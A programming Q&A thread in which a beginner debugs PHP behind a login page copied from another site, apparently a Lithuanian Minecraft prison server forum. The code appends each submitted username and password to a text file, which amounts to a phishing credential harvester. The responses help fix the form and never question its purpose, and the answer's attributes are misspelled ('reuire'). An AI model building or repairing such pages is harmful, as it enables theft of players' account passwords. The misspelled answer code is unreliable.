# Cant acces data php html

Tags: php, html, css

I'm just starting PHP and I downloaded random html code from a page and i tried to modify it, but i seems that I cannot acces data.

My php code looks like this

```
<?php       
    $file = "mcprisonlogs.txt";

    if($_GET['prisoniecionickas'].";".$_GET['prisonieciopaswordas']!= ";")
    {
        echo "test";
        file_put_contents($file, $_GET['prisoniecionickas'].";".$_GET['prisonieciopaswordas'], FILE_APPEND);
    }
?>
```

and i get this error

> [Sat Jun 09 09:24:01.371055 2018] [:error] [pid 22049] [client
>   ********:64177] PHP Notice:  Undefined index: prisonieciopaswordas in /home/****/domains/****/public_html/****.php on line 639, referer: ***

button code and two inputes look like this

```
<button type="submit" name="loginbutton" class="ipsButton ipsButton_primary" tabindex="2" accesskey="s" role="button">Prisijunkite</button>

<input
        type="text"
        name="prisoniecionickas"
        value=""
        id="elInput_auth"
        aria-required='true'
        placeholder='Vartotojo vardas'
></input>
<input
        type="password"
        name="prisonieciopaswordas"
        value=""
        id="elInput_password"
        aria-required='true'
        placeholder='Slaptažodis'
></input>
```

I've spent like 5 hours atm, I cant find the problem, heelp

Comment: are the inputs within a form element? might be worth adding the whole form element to the question

Comment: What is your `if` supposed to do?? `if($_GET['prisoniecionickas'].";".$_GET['prisonieciopaswordas']!= ";")`

Comment: That if checks if there is information if there isnt, it wont put in the file

Answer (score 0):

This seems like you doesn't enter proper value into form while submitting it so you can use

```
<input
type="text"
name="prisoniecionickas"
value=""
id="elInput_auth"
aria-required='true'
placeholder='Vartotojo vardas'
reuire="true" />
```

And for password

```
<input
type="password"
name="prisonieciopaswordas"
value=""
id="elInput_password"
aria-required='true'
placeholder='Slaptažodis'
require="true" />
```

After trying this code you can find proper problem of your code!
And there is not needed to use semicolon in to if parameaters

Comment: Doesn't work. I replaced it with your code, still nothing.

Comment: These two errors. [Fri Jun 15 21:54:57.207806 2018] [:error] [pid 16530] [client :49784] PHP Notice:  Undefined index: prisoniecionickas in /home//domains/.tk/public_html/.php on line 637, referer: http://www..tk/.php
[Fri Jun 15 21:54:57.207849 2018] [:error] [pid 16530] [client :49784] PHP Notice:  Undefined index: prisonieciopaswordas in /home//domains/.tk/public_html/.php on line 637, referer: http://www..tk/.php